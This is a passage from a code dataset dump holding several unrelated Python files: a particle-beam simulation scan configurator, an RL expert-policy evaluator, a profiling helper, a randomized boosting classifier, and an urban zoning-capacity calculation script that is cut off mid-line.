/afs/cern.ch/work/g/giadarol/sim_workspace_mpi_py3/setpythopath\nPYTHONPATH=$PYTHONPATH:{os.path.abspath('../')}\n'''\n# Last one is to get response matrix path\n\nstrength_scan = np.arange(0.02, 2.01, 0.02)\n\nfiles_to_be_copied = [\n '../004_instability_simulation/000_simulation_matrix_map.py',\n '../004_instability_simulation/run_it_several_times',\n ]\n\nsettings_to_be_replaced_in = '000_simulation_matrix_map.py'\n\n\nscan_folder_abs = os.getcwd() + '/' + scan_folder_rel\nos.mkdir(scan_folder_abs)\n\n# prepare scan\nfor ii in range(len(strength_scan)):\n\n # Make directory\n current_sim_ident= f'strength_{strength_scan[ii]:.2e}'\n print(current_sim_ident)\n current_sim_abs_path = scan_folder_abs+'/'+current_sim_ident\n os.mkdir(current_sim_abs_path)\n\n # Copy files\n for ff in files_to_be_copied:\n os.system(f'cp {ff} {current_sim_abs_path}')\n\n # Replace settings section\n settings_section = f'''# start-settings-section\nn_terms_to_be_kept = 200\nn_tail_cut = 10\nrecenter_all_slices = True # Cancels initial kick from input\n\nQp_x = 
0.\nQp_y = 0.\nplane = 'y'\n\necloud_strength_scale = {strength_scan[ii]:e}\n\nsim_param_file = '../../../reference_simulation/Simulation_parameters.py'\nsim_param_amend_files = ['../../../Simulation_parameters_amend.py',\n 'Simulation_parameters_amend_for_matrixsim.py']\n\ninclude_response_matrix = True\nresponse_data_file = '../../../001_sin_response_scan/response_data_y_processed.mat'\n\ninclude_detuning_with_z = True\nonly_phase_shift = True\nadd_alpha_0_to_tune = False\nfactor_alpha_0_to_tune = 0.\nz_strength_file = '../../../000a_sin_response_unperturbed_pinch/linear_strength_y.mat'\ndetuning_fit_order = 20\nN_poly_cut = detuning_fit_order + 1\nalpha_N_custom = []\n\ninclude_non_linear_map = False\nflag_wrt_bunch_centroid = False\nfield_map_file = '../../../003_generate_field_map/field_map_lin.mat'\n# end-settings-section'''\n\n sim_param_amend_curr= f'''\nN_turns = 8000\n\nenable_transverse_damper = False\nV_RF = 6e6\nlongitudinal_mode = 'linear'\n\nn_slices = 200\nmacroparticles_per_slice = 2000\nn_macroparticles = macroparticles_per_slice*n_slices\n'''\n\n with open(current_sim_abs_path\n + '/Simulation_parameters_amend_for_matrixsim.py', 'w') as fid:\n fid.write(sim_param_amend_curr)\n\n with open(current_sim_abs_path+'/'+settings_to_be_replaced_in, 'r') as fid:\n lines = fid.readlines()\n istart = np.where([ss.startswith('# start-settings-section') for ss in lines])[0][0]\n iend = np.where([ss.startswith('# end-settings-section') for ss in lines])[0][0]\n with open(current_sim_abs_path+'/'+settings_to_be_replaced_in, 'w') as fid:\n fid.writelines(lines[:istart])\n fid.write(settings_section + '\\n')\n fid.writelines(lines[iend+1:])\n\n # Prepare run script\n run_script_curr= '''#!/bin/bash\nfor i in {1..1}\ndo\n echo \"Iteration $i\"\n if test -f \"met_stop_condition\"; then\n\t echo \"Met stop condition!\"\n\t break\n fi\n python 000_simulation_matrix_map.py\ndone\n '''\n with open(current_sim_abs_path + '/run_it_several_times', 'w') as fid:\n fid.write(run_script_curr)\n\n # Prepare job script\n job_content = f'''#!/bin/bash\n\n{environment_preparation}\n\n# Environment preparation\necho PYTHONPATH=$PYTHONPATH\necho which python\nwhich python\n\ncd {current_sim_abs_path}\n\nbash run_it_several_times\n'''\n with open(current_sim_abs_path + '/job.job', 'w') as fid:\n fid.write(job_content)\n\n# Prepare htcondor cluster of jobs\nimport PyPARIS_sim_class.htcondor_config as htcc\nhtcc.htcondor_config(\n scan_folder_abs,\n time_requirement_days=2., # 120 minutes\n htcondor_files_in=scan_folder_abs)\n","sub_path":"005t2_dipolar_and_phase_shift/000_config_scan.py","file_name":"000_config_scan.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"80956702","text":"import load_policy\nimport numpy as np\n\n\nclass Expert(object):\n def __init__(self, env_fn, expert_fpath):\n self.env = env_fn()\n self.policy_fn = load_policy.load_policy(expert_fpath)\n\n def policy(self, obs):\n return self.policy_fn(obs[None, :])\n\n def evaluate(self):\n print('\\n Evaluating Expert...')\n num_episodes = 10\n rewards = []\n env = self.env\n\n for _ in range(num_episodes):\n total_rewards = 0.\n obs = env.reset()\n while True:\n action = self.policy(obs)\n new_obs, reward, done, _ = env.step(action)\n obs = new_obs\n total_rewards += reward\n if done:\n break\n rewards.append(total_rewards) \n\n print(f'reward: {np.mean(rewards)}+-{np.std(rewards)}')\n\n\nif __name__ == '__main__':\n import gym\n import 
tensorflow as tf\n env_fn = lambda: gym.make('Hopper-v2')\n with tf.Session():\n expert = Expert(env_fn, 'experts/Hopper-v2.pkl')\n expert.evaluate()\n","sub_path":"hw1/expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596077787","text":"import resource\nimport yappi\n\nfrom spardaqus import globals\nfrom spardaqus.core.utils import nowstr, info\n\n\ndef _m(x):\n return str(round(x / 1024.0 / globals.RSS_MEMORY_DIVISOR, 3))\n\n\ndef memory():\n \"\"\"Take an available memory measurement. If larger than the current value of globals.MAX_RSS_MEMORY_USED,\n replace globals.MAX_RSS_MEMORY_USED with the new value. At EOP, globals.MAX_RSS_MEMORY_USED will contain\n the largest point in time amount of memory used by Spardaqus.\"\"\"\n curr_mem_used = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss - globals.RSS_MEMORY_BASE\n if curr_mem_used > globals.MAX_RSS_MEMORY_USED:\n globals.MAX_RSS_MEMORY_USED = curr_mem_used\n if globals.LAST_RSS_MEMORY_USED == 0:\n info(\"--profile: memory in use: %s MB so far\" % _m(curr_mem_used))\n else:\n pct_change = str(round((curr_mem_used - globals.LAST_RSS_MEMORY_USED) / globals.LAST_RSS_MEMORY_USED * 100.0, 2))\n if curr_mem_used > globals.LAST_RSS_MEMORY_USED:\n pct_change = \"+%s%%; \" % pct_change\n info(\"** --profile: memory in use: %s MB (%s%s max MB so far)\" %\n (_m(curr_mem_used),\n pct_change,\n _m(globals.MAX_RSS_MEMORY_USED)))\n elif curr_mem_used < globals.LAST_RSS_MEMORY_USED:\n pct_change = \"%s%%; \" % pct_change\n info(\"** --profile: memory in use: %s MB (%s%s max MB so far)\" %\n (_m(curr_mem_used),\n pct_change,\n _m(globals.MAX_RSS_MEMORY_USED)))\n globals.LAST_RSS_MEMORY_USED = curr_mem_used\n\n\ndef start(tag=None):\n \"\"\"Starts a yappi profiling session.\"\"\"\n\n pstats_file = '/var/log/spardaqus/yappi.%s.%s.%s%s' % (globals.__NAME__, globals.__VERSION__, \"%s.\" % tag if tag else \"\", nowstr())\n yappi.clear_stats()\n yappi.start()\n info(\"** --profile specified; performance profiling started\")\n info(\"** --profile pstats data will be written to %s\" % pstats_file)\n return pstats_file\n\n\ndef end(pstats_file):\n \"\"\"Ends yappi profiling session, saves the profilinf info to a CProfile pstats file, and pretty-prints it to the console.\"\"\"\n yappi.stop()\n func_stats = yappi.get_func_stats()\n if func_stats:\n _rows = []\n for _stat in func_stats._as_dict:\n if '/Spardaqus/' in _stat.full_name and '/venv/' not in _stat.full_name:\n _gizmo = _stat.full_name.split(\"/\")[-1]\n _rows.append([_gizmo.split(\" \")[1], _gizmo.split(\" \")[0], _stat.ncall, _stat.tavg, _stat.ttot, _stat.tsub])\n info(\"*\")\n info(\"* TOP 50 CALLS BY TOT TIME\")\n info(\"*\")\n _hdr = [\"NAME\", \"LOCATION\", \"CALLS\", \"AvgTIME\", \"TotTIME\", \"TotTIMELessSubcalls\"]\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_hdr))\n _rows.sort(key=lambda x: x[4], reverse=True)\n i = 0\n for _row in _rows:\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_row))\n i += 1\n if i == 50:\n break\n info(\"*\")\n info(\"* TOP 50 CALLS BY NUMBER OF CALLS\")\n info(\"*\")\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_hdr))\n _rows.sort(key=lambda x: x[2], reverse=True)\n i = 0\n for _row in _rows:\n info(\"{: <40} {: <32} {: >12} {: >24} {: >24} {: >24}\".format(*_row))\n i += 1\n if i == 50:\n break\n func_stats.save(pstats_file, type='pstat')\n 
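# the saved pstats file can also be inspected offline with the stdlib; a minimal\n # sketch (not executed here), assuming the path returned by start():\n # import pstats\n # pstats.Stats(pstats_file).sort_stats('cumtime').print_stats(25)\n 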
yappi.clear_stats()","sub_path":"spardaqus/core/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349542971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# ## Simple Holenstein Boosting Algorithm\n# ### Based on Dr. Russell Impagliazzo's paper\n\n# In[1]:\n\n\n# imports\n\nimport math\nimport numpy as np\nimport random\nfrom numpy.random import choice\nfrom numba import jit, njit\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\n# Aggregating weak learners using simple holenstein boosting algorithm\n\nclass HolensteinBoostClassifier:\n\n def __init__(self, max_depth=1, eps=0.05):\n\n self.weak_learners = []\n self.max_depth = max_depth\n self.eps = eps\n\n\n def fit(self, X, y, n_estimators=100):\n \"\"\"\n :param X: nd-array of training instances\n :param y: 1d-array of labels\n :param n_estimators: int representing the number of weak learners to train. default of 100\n :return: none\n \"\"\"\n\n n = len(X)\n size = n // 10 # size of subsample for training each tree\n weights = np.full(n, 1/n) # uniform distribution\n\n\n self.weak_learners = []\n for _ in range(n_estimators): # create n weak learners\n\n\n inds = choice(np.arange(n), p=weights, size=size, replace=True)\n X_selected = X[inds, :]\n y_selected = y[inds]\n\n\n stump = DecisionTreeClassifier(max_depth=self.max_depth)\n stump.fit(X_selected, y_selected)\n\n\n for i, correct in enumerate(stump.predict(X_selected)*y_selected): #update weights, correct is 1/-1\n # weights[i] *= math.exp(-self.eps*correct*random.uniform(0,2))\n weights[i] = random.random()\n weights /= sum(weights)\n\n\n self.weak_learners.append(stump) # add weak learner to ensemble\n\n\n def predict(self, X):\n if len(self.weak_learners) < 1:\n raise Exception(\"Must fit before predicting!\")\n\n return np.sign(sum(map(lambda learner: learner.predict(X), self.weak_learners)))\n\n\n # accuracy\n def score(self, X, y):\n return sum(y==self.predict(X))/len(y)\n\n\n\n","sub_path":"old/randhboost.py","file_name":"randhboost.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"369172035","text":"USAGE=\"\"\"\n\n Given a set of base zoning (parcel-level) and zoning_mods (representing one upzoning scheme) data, \n calculate the raw and net development capacity under the upzoning scheme.\n\n Input: p10, parcels with PARCEL_ID, ACRES attributes\n zoning_parcels_hybrid_pba50.csv, p10 combined with zoning_id data output by 4_create_hybrid_urbansim_input.py\n zoning_lookup_hybrid_pba50.csv, lookup table of zoning_id to allowable development types and intensities\n p10_pba50_attr.csv, p10 combined with zoningmods categories data\n \n Output: compare_juris_capacity.csv, jurisdiction-level development capacity metrics\n compare_taz_capacity.csv, TAZ-level development capacity metrics\n\n\n Run with (scenario 23 as an example): \n python calculate_upzoning_capacity.py -zoningmods_scenario \"24\" -zoningmods_version \"20200916\" -attr_version \"20200915\" -test\n\n In test mode (specified by --test), outputs files to cwd and without date prefix; otherwise, outputs to PLU_BOC_DIR with date prefix\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport argparse, os, glob, logging, sys, time\nimport dev_capacity_calculation_module\n\nNOW = time.strftime(\"%Y_%m%d_%H%M\")\ntoday = time.strftime('%Y_%m_%d')\n\n\nif 
os.getenv('USERNAME') =='ywang':\n M_DIR = 'M:\\\\Data\\\\Urban\\\\BAUS\\\\PBA50\\\\Final_Blueprint'\n M_SMELT_DIR = 'M:\\\\Data\\\\GIS layers\\\\UrbanSim smelt\\\\2020 03 12'\n BOX_DIR = 'C:\\\\Users\\\\{}\\\\Box\\\\Modeling and Surveys\\\\Urban Modeling\\\\Bay Area UrbanSim\\\\PBA50'.format(os.getenv('USERNAME'))\n# GITHUB_URBANSIM_DIR = 'C:\\\\Users\\\\{}\\\\Documents\\\\GitHub\\\\bayarea_urbansim\\\\data'.format(os.getenv('USERNAME'))\n\nelif os.getenv('USERNAME') =='lzorn':\n M_DIR = 'M:\\\\Data\\\\Urban\\\\BAUS\\\\PBA50\\\\Final_Blueprint'\n M_SMELT_DIR = 'M:\\\\Data\\\\GIS layers\\\\UrbanSim smelt\\\\2020 03 12'\n BOX_DIR = 'C:\\\\Users\\\\{}\\\\Box\\\\Modeling and Surveys\\\\Urban Modeling\\\\Bay Area UrbanSim\\\\PBA50'.format(os.getenv('USERNAME'))\n# GITHUB_URBANSIM_DIR = 'C:\\\\Users\\\\{}\\\\Documents\\\\GitHub\\\\bayarea_urbansim\\\\data'.format(os.getenv('USERNAME'))\n\n\n# raw and net development capacity metrics\nRAW_CAPACITY_CODES = ['zoned_du', 'zoned_Ksqft', 'job_spaces']\nNET_CAPACITY_CODES = ['zoned_du_vacant', 'zoned_Ksqft_vacant', 'job_spaces_vacant',\n 'zoned_du_underbuild', 'zoned_Ksqft_underbuild', 'job_spaces_underbuild',\n 'zoned_du_underbuild_noProt', 'zoned_Ksqft_underbuild_noProt', 'job_spaces_underbuild_noProt']\nBAUS_CAPACITY_CODES = ['residential_units',\n 'job_spaces',\n 'non_residential_sqft',\n 'zoned_du_underbuild',\n 'zoned_du',\n 'zoned_du_underbuild_nodev',\n 'totemp']\n\n\ndef apply_upzoning_to_parcel_data(logger, parcel_basezoning_original,\n upzoning_scenario, upzoning_version):\n \"\"\"\n Apply upzoning to parcels by adjusting the allowable development types and intensities.\n\n * upzoning_scenario: version of zoning_mods for upzoning, e.g. 's20', 's21', 's22', \n 's23' for Draft/Final Blueprint\n\n Returns a dataframe with columns PARCEL_ID, juris_zmod, plus XX_upzoning for each allowed \n development type or intensity attribute.\n \"\"\"\n \n\n\n # Make a copy and add '_basezoning' to basezoning attributes\n parcel_basezoning = parcel_basezoning_original.copy()\n\n\n # Read zoningmods lookup data and merge with parcels\n zmods_upzoning_file = os.path.join(PBA50_ZONINGMODS_DIR, \n 'zoning_mods_{}_{}.csv'.format(upzoning_scenario, upzoning_version))\n\n if not os.path.exists(zmods_upzoning_file):\n print('Error: file {} not found'.format(zmods_upzoning_file))\n raise\n\n use_cols = ['fbpzoningm','add_bldg', 'drop_bldg', \n 'dua_up', 'far_up', 'dua_down', 'far_down', 'res_rent_cat']\n zmods_upzoning_df = pd.read_csv(zmods_upzoning_file, usecols = use_cols)\n\n # Merge upzoning with basezoning\n parcel_basezoning_zoningmods = parcel_basezoning.merge(zmods_upzoning_df,\n on = 'fbpzoningm', \n how = 'left')\n\n keep_cols = list(parcel_basezoning)\n\n # create allowed development type and intensity columns for upzoning\n # and default to base zoning\n for dev_type in dev_capacity_calculation_module.ALLOWED_BUILDING_TYPE_CODES:\n parcel_basezoning_zoningmods[\"{}_{}\".format(dev_type, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[\"{}_basezoning\".format(dev_type)]\n # keep the new column\n keep_cols.append(\"{}_{}\".format(dev_type, upzoning_scenario))\n\n for intensity in dev_capacity_calculation_module.INTENSITY_CODES:\n parcel_basezoning_zoningmods[\"max_{}_{}\".format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[\"max_{}_basezoning\".format(intensity)]\n # keep the new column\n keep_cols.append(\"max_{}_{}\".format(intensity, upzoning_scenario))\n\n\n # Get a list of development types that have modifications in 
pba50zoningmod\n add_bldg_types = list(zmods_upzoning_df.add_bldg.dropna().unique())\n logger.info('Development types enabled by upzoning:\\n{}'.format(add_bldg_types))\n drop_bldg_types = list(zmods_upzoning_df.drop_bldg.dropna().unique())\n logger.info('Development types disallowed by upzoning:\\n{}'.format(drop_bldg_types))\n\n\n # Make a copy and then modify the allowed dev types\n #zoning_modify_type = zoning_base_pba50.copy()\n\n if len(add_bldg_types) > 0:\n for devType in add_bldg_types:\n add_bldg_parcels = parcel_basezoning_zoningmods.add_bldg == devType\n parcel_basezoning_zoningmods.loc[add_bldg_parcels, devType+'_'+upzoning_scenario] = 1\n\n if len(drop_bldg_types) > 0:\n for devType in drop_bldg_types:\n drop_bldg_parcels = parcel_basezoning_zoningmods.drop_bldg == devType\n parcel_basezoning_zoningmods.loc[drop_bldg_parcels,devType+'_'+upzoning_scenario] = 0\n\n # Compare allowed dev types before and after applying pba50zoningmod\n for devType in add_bldg_types + drop_bldg_types:\n logger.info('Out of {:,} parcels: \\n {:,} parcels allow {} before applying fbpzoningm dev type adjustment;\\\n \\n {:,} parcels allow {} after applying fbpzoningm dev type adjustment.'.format(len(parcel_basezoning_zoningmods),\n len(parcel_basezoning_zoningmods.loc[parcel_basezoning_zoningmods[devType+'_basezoning'] == 1]), devType,\n len(parcel_basezoning_zoningmods.loc[parcel_basezoning_zoningmods[devType+'_'+upzoning_scenario] == 1]), devType))\n\n\n # Make a copy and then modify the intensities\n #zoning_modify_intensity = zoning_modify_type.copy()\n\n for intensity in ['dua','far']:\n\n # modify intensity when 'intensity_up' is not null\n up_parcels = parcel_basezoning_zoningmods['{}_up'.format(intensity)].notnull()\n\n # the effective max_dua is the larger of base zoning max_dua and the pba50 max_dua\n parcel_basezoning_zoningmods.loc[up_parcels, 'max_{}_{}'.format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[['max_{}_{}'.format(intensity, upzoning_scenario),'{}_up'.format(intensity)]].max(axis = 1)\n\n # modify intensity when 'intensity_down' is not null\n down_parcels = parcel_basezoning_zoningmods['{}_down'.format(intensity)].notnull()\n\n # the effective max_dua is the smaller of base zoning max_dua and the pba50 max_dua\n parcel_basezoning_zoningmods.loc[down_parcels, 'max_{}_{}'.format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[['max_{}_{}'.format(intensity, upzoning_scenario),'{}_down'.format(intensity)]].min(axis = 1)\n\n # Compare max_dua and max_far before and after applying pba50zoningmod\n logger.info('Before applying fbpzoningm intensity adjustment: \\n{}'.format(\n parcel_basezoning_zoningmods[['max_'+intensity+'_basezoning']].describe()))\n logger.info('After applying fbpzoningm intensity adjustment: \\n{}'.format(\n parcel_basezoning_zoningmods[['max_'+intensity+'_'+upzoning_scenario]].describe()))\n\n parcel_upzoning = parcel_basezoning_zoningmods[keep_cols]\n logger.info('Generate parcel-level upzoning table of {:,} records: \\n {}'.format(len(parcel_upzoning), parcel_upzoning.head()))\n return parcel_upzoning\n\ndef summary_capacity(parcel_capacity, groupby_field, capacity_metrics):\n return parcel_capacity.groupby([groupby_field])[capacity_metrics].sum().reset_index()\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter,)\n parser.add_argument(\"-zoningmods_scenario\", help=\"zoningmods scenario\")\n parser.add_argument(\"-zoningmods_version\", help=\"version 
of zoningmods, represented by the date\")\n parser.add_argument(\"-attr_version\", help=\"version of p10_pba50_attr, represented by the date\")\n parser.add_argument(\"-test\", action=\"store_true\", help=\"Test mode\")\n args = parser.parse_args()\n\n ## inputs\n URBANSIM_BASEZONING_DIR = os.path.join(M_DIR, 'Large General Input Data')\n PARCEL_ZONING_ID_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_06_22_zoning_parcels_hybrid_pba50.csv')\n BASEZONING_LOOKUP_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_06_22_zoning_lookup_hybrid_pba50.csv')\n # URBANSIM_PARCEL_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_04_17_parcels_geography.csv')\n URBANSIM_PARCEL_TAZ_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_08_17_parcel_to_taz1454sub.csv')\n\n PBA50_ZONINGMODS_DIR = os.path.join(M_DIR, 'Zoning Modifications')\n PARCEL_ZONINGMODS_PBA50_FILE = os.path.join(PBA50_ZONINGMODS_DIR, 'p10_pba50_attr_{}.csv'.format(str(args.attr_version)))\n\n # output\n # In test mode (specified by --test), outputs to cwd and without date prefix; otherwise, outputs to URBANSIM_UPZONING_DIR with date prefix\n BOX_UPZONING_DIR = os.path.join(BOX_DIR, 'Policies', 'Zoning Modifications', 'capacity')\n\n COMPARE_JURIS_CAPACITY_FILE = \"compare_juris_capacity_{}.csv\".format(args.zoningmods_scenario)\n COMPARE_TAZ_CAPACITY_FILE = 'compare_taz_capacity_{}.csv'.format(args.zoningmods_scenario)\n LOG_FILE = \"compare_juris_capacity_{}.log\".format(args.zoningmods_scenario)\n\n # QA/QC files exported in test mode\n P10_BASEZONING_FILE = 'p10_basezoning.csv'\n P10_UPZONING_PBA50_FILE = 'p10_upzoning_pba50_{}.csv'.format(args.zoningmods_scenario)\n PARCEL_CAPACITY_BASEZONING_FILE = 'parcel_capacity_basezoning.csv'\n PARCEL_CAPACITY_UPZONING_FILE = 'parcel_capacity_upzoning_{}.csv'.format(args.zoningmods_scenario)\n PARCEL_CAPACITY_BAUS_FILE = 'parcel_capacity_baus_{}.csv'.format(args.zoningmods_scenario)\n \n\n if args.test == False:\n LOG_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, LOG_FILE))\n COMPARE_JURIS_CAPACITY_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, COMPARE_JURIS_CAPACITY_FILE))\n COMPARE_TAZ_CAPACITY_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, COMPARE_TAZ_CAPACITY_FILE))\n\n pd.set_option('max_columns', 200)\n pd.set_option('display.width', 200)\n\n # create logger\n logger = logging.getLogger(__name__)\n logger.setLevel('DEBUG')\n\n # console handler\n ch = logging.StreamHandler()\n ch.setLevel('INFO')\n ch.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))\n logger.addHandler(ch)\n # file handler\n fh = logging.FileHandler(LOG_FILE, mode='w')\n fh.setLevel('DEBUG')\n fh.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))\n logger.addHandler(fh)\n\n logger.info(\"BOX_UPZONING_DIR = {}\".format(BOX_UPZONING_DIR))\n logger.info(\"COMPARE_JURIS_CAPACITY_FILE = {}\".format(COMPARE_JURIS_CAPACITY_FILE))\n logger.info(\"COMPARE_TAZ_CAPACITY_FILE = {}\".format(COMPARE_TAZ_CAPACITY_FILE))\n\n ## Read p10 parcels data\n basemap_p10_file = os.path.join(M_SMELT_DIR, 'p10.csv')\n basemap_p10 = pd.read_csv(basemap_p10_file,\n usecols =['PARCEL_ID', 'ACRES', 'LAND_VALUE'])\n # conver PARCEL_ID to integer:\n basemap_p10['PARCEL_ID'] = basemap_p10['PARCEL_ID'].apply(lambda x: int(round(x)))\n logger.info(\"Read {:,} rows from {}\".format(len(basemap_p10), basemap_p10_file))\n logger.info(\"\\n{}\".format(basemap_p10.head()))\n logger.info('Number 
of unique PARCEL_ID: {}'.format(len(basemap_p10.PARCEL_ID.unique())))\n\n\n ## Read parcel with base zoning data\n parcel_use_cols = ['PARCEL_ID', 'zoning_id','nodev']\n parcel_zoning_id = pd.read_csv(PARCEL_ZONING_ID_FILE,\n usecols = parcel_use_cols)\n parcel_zoning_id.rename(columns = {'PARCEL_ID': 'PARCEL_ID_pz'}, inplace=True)\n basezoning_lookup = pd.read_csv(BASEZONING_LOOKUP_FILE)\n basezoning_lookup.columns = [col+'_basezoning' for col in basezoning_lookup.columns.values]\n\n parcel_basezoning = parcel_zoning_id.merge(basezoning_lookup,\n left_on = 'zoning_id',\n right_on = 'id_basezoning',\n how = 'left')\n parcel_basezoning.rename(columns = {'nodev': 'nodev_basezoning'}, inplace=True)\n logger.info(\"Parcels with base zoning has {} records, with columns:\\n{}\".format(len(parcel_basezoning), parcel_basezoning.dtypes))\n\n\n # Read PBA50 zoningmods\n parcel_zoningmods = pd.read_csv(PARCEL_ZONINGMODS_PBA50_FILE,\n usecols = ['PARCEL_ID', 'fbpzoningm', 'juris'])\n parcel_zoningmods.PARCEL_ID = parcel_zoningmods.PARCEL_ID.apply(lambda x: int(round(x)))\n parcel_zoningmods.rename(columns = {'PARCEL_ID': 'PARCEL_ID_attr'}, inplace=True)\n\n # Add base zoning and PBA50 zoningmods to p10 parcels\n p10_basezoning = basemap_p10.merge(parcel_basezoning,\n left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_pz',\n how = 'left').merge(parcel_zoningmods,\n left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_attr',\n how = 'left')\n # in test mode, export the data for QA/QC\n if args.test == True:\n logger.info(\"Export p10_basezoning\")\n p10_basezoning.to_csv(P10_BASEZONING_FILE, index=False)\n\n\n logger.info(\"Running step ------ Applying upzoning {}\".format('zoning_mods_{}_{}.csv'.format(args.zoningmods_scenario, \n args.zoningmods_version)))\n\n p10_upzoning_pba50 = apply_upzoning_to_parcel_data(logger, p10_basezoning, args.zoningmods_scenario, args.zoningmods_version)\n\n logger.info(\"Generating p10_upzoning_pba50 with {} records;\\n Headers:\\n{}\".format(len(p10_upzoning_pba50),\n p10_upzoning_pba50.head()))\n\n\n ## B10 buildings with p10 parcels data\n basemap_b10_file = os.path.join(M_SMELT_DIR, 'b10.csv')\n basemap_b10 = pd.read_csv(basemap_b10_file)\n # conver PARCEL_ID to integer:\n basemap_b10['parcel_id'] = basemap_b10['parcel_id'].apply(lambda x: int(round(x)))\n logger.info(\"Read {:,} rows from {}\".format(len(basemap_b10), basemap_b10_file))\n logger.info(\"\\n{}\".format(basemap_b10.head()))\n logger.info('b10 building data has {:,} unique PARCEL_ID:'.format(len(basemap_b10.parcel_id.unique())))\n\n # join parcels to buildings which is used to determine current built-out condition when calculating net capacity\n building_parcel = pd.merge(left=basemap_b10, \n right=basemap_p10[['PARCEL_ID','LAND_VALUE','ACRES']],\n left_on='parcel_id', \n right_on='PARCEL_ID', \n how='outer')\n\n # compute allowed development type - residential vs non-residential for each parcel\n basezoning_allow_dev_type = \\\n dev_capacity_calculation_module.set_allow_dev_type(p10_upzoning_pba50, boc_source=\"basezoning\")\n upzoning_allow_dev_type = \\\n dev_capacity_calculation_module.set_allow_dev_type(p10_upzoning_pba50, boc_source=args.zoningmods_scenario)\n\n # put them together\n p10_upzoning_pba50 = p10_upzoning_pba50.merge(basezoning_allow_dev_type,\n on = 'PARCEL_ID',\n how = 'left').merge(upzoning_allow_dev_type,\n on = 'PARCEL_ID',\n how = 'left')\n \n # Add TAZ id to parcel data\n parcel_taz = pd.read_csv(URBANSIM_PARCEL_TAZ_FILE,\n \t usecols = ['PARCEL_ID', 'ZONE_ID'])\n parcel_taz.PARCEL_ID = 
parcel_taz.PARCEL_ID.apply(lambda x: int(round(x)))\n parcel_taz.ZONE_ID = parcel_taz.ZONE_ID.apply(lambda x: int(round(x)))\n parcel_taz.rename(columns ={'PARCEL_ID': 'PARCEL_ID_taz'}, inplace=True)\n\n p10_upzoning_pba50 = p10_upzoning_pba50.merge(parcel_taz,\n \t left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_taz',\n \t how = 'left')\n\n logger.debug(\"p10_upzoning_pba50 with columns:\\n{}\".format(p10_upzoning_pba50.dtypes))\n\n # in test mode, export the data for QA/QC\n if args.test == True:\n logger.info(\"Export p10_upzoning_pba50\")\n p10_upzoning_pba50.to_csv(P10_UPZONING_PBA50_FILE, index = False)\n\n\n ## calculate raw and net capacity for basezoning and upzoning\n\n logger.info(\"Running step ------ Calculating raw development capacity under basezoning\")\n\n raw_parcel_capacity_basezoning = dev_capacity_calculation_module.calculate_capacity(p10_upzoning_pba50,\n \"basezoning\",\n \"basezoning\",\n pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"raw_parcel_capacity_basezoning.head():\\n{}\".format(raw_parcel_capacity_basezoning.head()))\n\n logger.info(\"Running step ------ Calculating raw development capacity under {}\".format('zoning_mods_'+args.zoningmods_scenario))\n raw_parcel_capacity_upzoning = dev_capacity_calculation_module.calculate_capacity(p10_upzoning_pba50,\n args.zoningmods_scenario,\n \"basezoning\",\n pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"raw_parcel_capacity_upzoning.head():\\n{}\".format(raw_parcel_capacity_upzoning.head()))\n \n logger.info(\"Running step ------ Calculating net development capacity under basezoning\")\n\n net_parcel_capacity_basezoning = dev_capacity_calculation_module.calculate_net_capacity(logger, \n p10_upzoning_pba50,\n \"basezoning\",\n \"basezoning\",\n building_parcel,\n net_pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"net_parcel_capacity_basezoning.head():\\n{}\".format(net_parcel_capacity_basezoning.head())) \n\n logger.info(\"Running step ------ Calculating net development capacity under {}\".format('zoning_mods_'+args.zoningmods_scenario))\n net_parcel_capacity_upzoning = dev_capacity_calculation_module.calculate_net_capacity(logger, \n p10_upzoning_pba50,\n args.zoningmods_scenario,\n \"basezoning\",\n building_parcel,\n net_pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"net_parcel_capacity_upzoning.head():\\n{}\".format(net_parcel_capacity_upzoning.head()))\n\n # in test mode, export the data for QA/QC\n if args.test == True:\n raw_parcel_capacity_basezoning.to_csv('raw_parcel_capacity_basezoning.csv', index = False)\n net_parcel_capacity_basezoning.to_csv('net_parcel_capacity_basezoning.csv', index = False)\n raw_parcel_capacity_upzoning.to_csv('raw_parcel_capacity_upzoning.csv', index = 